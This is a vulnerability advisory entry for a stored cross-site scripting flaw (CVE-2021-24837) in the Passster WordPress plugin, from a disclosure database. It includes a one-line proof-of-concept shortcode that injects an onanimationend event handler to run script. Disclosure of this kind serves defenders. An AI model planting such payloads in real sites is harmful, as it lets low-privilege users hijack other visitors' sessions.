Lucene search
Apple502jWPVDB-ID:5FEA3AC3-D599-41F3-8F76-08F0D3552AF1HistoryDec 29, 2022 - 12:00 a.m.
Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2022-12-2900:00:00
apple502j
wpscan.com
6
passster
plugin
vulnerability
stored xss
cross-site scripting
EPSS
0.001
Percentile
23.5%
The plugin does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.
PoC
[passster password=“1” area=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(/XSS/)//’]
Related
cvelist
cvelist
CVE-2021-24837 Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2023-01-23 14:31:59
wpexploit
wpexploit
Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting
2022-12-29 00:00:00
cve
cve
CVE-2021-24837
2023-01-23 15:15:13
prion
prion
Cross site scripting
2023-01-23 15:15:00
nvd
nvd
CVE-2021-24837
2023-01-23 15:15:13